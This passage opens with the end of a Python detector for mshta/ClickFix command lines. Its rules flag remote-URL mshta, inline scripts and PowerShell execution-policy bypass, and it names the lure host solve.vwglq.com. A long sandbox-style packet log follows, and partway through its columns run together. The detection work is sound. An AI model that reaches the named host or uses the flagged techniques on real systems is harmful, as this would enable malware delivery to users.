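    if "mshta_remote_url" in tags or "mshta_inline_script" in tags:
        severity = "high"
    elif "mshta_execution" in tags:
        severity = "medium"
    if severity == "high" and ("clickfix_lure_text" in tags or "powershell_ep_bypass" in tags):
        severity = "critical"
    return {"severity": severity, "tags": tags, "hosts": hosts}


def scan(cmdlines: dict) -> dict:
    """Run analyze_cmdline over a name -> command line mapping."""
    return {name: analyze_cmdline(cmd) for name, cmd in cmdlines.items()}


if __name__ == "__main__":
    for name, result in scan(SAMPLE_CMDLINES).items():
        print(f"{name:18} {result['severity']:8} {','.join(result['tags']) or '-'} {result['hosts']}")
```

Run on the page's own command line the function reports severity "critical" with tags mshta_execution, mshta_remote_url and clickfix_lure_text and extracts the host solve.vwglq.com; the locally sourced HTA only reaches "medium", which is the right place to keep a lower-fidelity rule. Feed it Sysmon event ID 1 or Security 4688 command lines rather than the script file itself, since the lure is usually pasted into Run and never lands on disk.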
Timestamp                           Src Port  Dst Port  Src IP         Dst IP
Jan 1, 2025 05:35:59.460694075 CET  49730     443       192.168.2.4    188.114.97.3
Jan 1, 2025 05:35:59.460736990 CET  443       49730     188.114.97.3   192.168.2.4
Jan 1, 2025 05:35:59.460810900 CET  49730     443       192.168.2.4    188.114.97.3
Jan 1, 2025 05:35:59.473858118 CET  49730     443       192.168.2.4    188.114.97.3
Jan 1, 2025 05:35:59.473881960 CET  443       49730     188.114.97.3   192.168.2.4
Jan 1, 2025 05:36:00.156857014 CET  443       49730     188.114.97.3   192.168.2.4
Jan 1, 2025 05:36:00.156936884 CET  49730     443       192.168.2.4    188.114.97.3
Jan 1, 2025 05:36:00.221250057 CET  49730     443       192.168.2.4    188.114.97.3
Jan 1, 2025 05:36:00.221275091 CET  443       49730     188.114.97.3   192.168.2.4
Jan 1, 2025 05:36:00.221489906 CET  443       49730     188.114.97.3   192.168.2.4
Jan 1, 2025 05:36:00.221545935 CET  49730     443       192.168.2.4    188.114.97.3
Jan 1, 2025 05:36:00.224175930 CET  49730     443       192.168.2.4    188.114.97.3
Jan 1, 2025 05:36:00.271328926 CET  443       49730     188.114.97.3   192.168.2.4
Jan 1, 2025 05:36:00.791820049 CET  443       49730     188.114.97.3   192.168.2.4
Jan 1, 2025 05:36:00.791883945 CET  443       49730     188.114.97.3   192.168.2.4
Jan 1, 2025 05:36:00.791973114 CET  49730     443       192.168.2.4    188.114.97.3
Jan 1, 2025 05:36:00.794188976 CET  49730     443       192.168.2.4    188.114.97.3
Jan 1, 2025 05:36:00.794208050 CET  443       49730     188.114.97.3   192.168.2.4
Jan 1, 2025 05:36:00.809817076 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:00.809869051 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:00.810058117 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:00.810436010 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:00.810452938 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.301028967 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.301105976 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.306360960 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.306370020 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.306680918 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.306745052 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.307118893 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.351330996 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.583880901 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.583926916 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.583964109 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.583992958 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.583997965 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.584013939 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.584028959 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.584038973 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.584054947 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.584059954 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.584069014 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.584095955 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.584115028 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.584213018 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.584254980 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.584374905 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.584467888 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.588716030 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.588759899 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.588787079 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.588850975 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.588859081 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.589112997 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.676201105 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.676331043 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.676363945 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.676390886 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.676417112 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.676460028 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.676470041 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.676527977 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.676548958 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.677299023 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.677355051 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.677383900 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.677407980 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.677407980 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.677417040 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.677432060 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.677443981 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.677462101 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.678252935 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.678297997 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.678349018 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.678354979 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.678359985 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.678391933 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.678400040 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.678404093 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.678431988 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.678455114 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.679204941 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.679239035 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.679265022 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.679291010 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.679300070 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.679305077 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.679337978 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.679390907 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.681123972 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.681433916 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.681451082 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.681493998 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.768801928 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.768867016 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.768944025 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.769002914 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.769037008 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.769078016 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.769125938 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.769175053 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.769216061 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.769269943 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.769380093 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.769412994 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.769424915 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.769431114 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.769438982 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.769457102 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.769465923 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.769469023 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.769495010 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.769517899 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.769856930 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.769896984 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.769913912 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.769917965 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.769926071 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.769942999 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.769968987 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.769973040 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.770029068 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.770587921 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.770622015 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.770642042 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.770647049 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.770674944 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.770700932 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.770714998 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.770755053 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.770762920 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.770766020 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.770786047 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.770796061 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.770807981 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.770811081 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.771168947 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.771195889 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.771563053 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.771605015 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.771617889 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.771622896 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.771646976 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.771665096 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.861345053 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.861387014 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.861455917 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.861463070 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.861474991 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.861498117 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.861519098 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.861522913 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.861541033 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.861562014 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.861567020 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.861588955 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.861609936 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.861835003 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.861884117 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.861903906 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.861948967 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.862400055 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.862432003 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.862447023 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.862449884 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.862467051 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.862474918 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.862489939 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.862493038 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.862518072 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.862543106 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.862838984 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.862874031 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.862895012 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.862898111 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.862907887 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.862926006 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.862931967 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.862935066 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.862943888 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.862963915 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.862981081 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.862993956 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.862997055 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.863014936 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.863039017 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.863679886 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.863718033 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.863735914 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.863740921 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.863768101 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.863775015 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.863812923 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.863857985 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.863864899 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.863867998 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.863888979 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.863895893 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.863919020 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.863922119 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.863953114 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.863969088 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.863977909 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.863981009 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.864007950 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.864033937 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.864867926 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.864898920 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.864929914 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.864933968 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.864944935 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.864963055 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.864979029 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.864988089 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.864990950 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.865008116 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.865019083 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.865036964 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.865040064 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.865062952 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.865087032 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.865720034 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.865758896 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.865763903 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.865767956 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.865808964 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.954052925 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.954072952 CET  443       49731     172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:01.954138994 CET  49731     443       192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:01.954148054 CET  443       49731     172.67.144.62  192.168.2.4
                                                      Jan 1, 2025 05:36:01.954183102 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.954344988 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.954360008 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.954391956 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.954396009 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.954423904 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.954437971 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.954854965 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.954868078 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.954927921 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.954932928 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.954972982 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.955156088 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.955173016 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.955219984 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.955224991 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.955265045 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.959109068 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.959124088 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.959172010 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.959177017 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.959213972 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.959223032 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.959671974 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.959685087 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.959748030 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.959750891 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.959809065 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.960092068 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.960108042 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.960164070 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.960169077 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.960210085 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.052865028 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.052881956 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.052962065 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.052967072 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053011894 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.053045034 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053056955 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053105116 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.053108931 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053148985 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.053194046 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053208113 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053262949 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.053267956 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053303957 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.053411961 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053425074 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053477049 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.053481102 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053520918 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.053702116 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053714991 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053776026 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.053781033 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053818941 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.053922892 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053939104 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053971052 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.053976059 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.054007053 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.054022074 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.054131031 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.054152012 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.054188013 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.054191113 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.054197073 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.054224968 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.054250002 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.054402113 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.054419994 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.054471970 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.054476023 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.054522991 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.138999939 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139015913 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139075994 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139081955 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139121056 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139269114 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139281988 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139316082 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139319897 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139343977 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139362097 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139370918 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139410019 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139415979 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139421940 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139451981 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139484882 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139523983 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139698029 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139712095 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139746904 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139751911 CET44349731172.67.144.62192.168.2.4
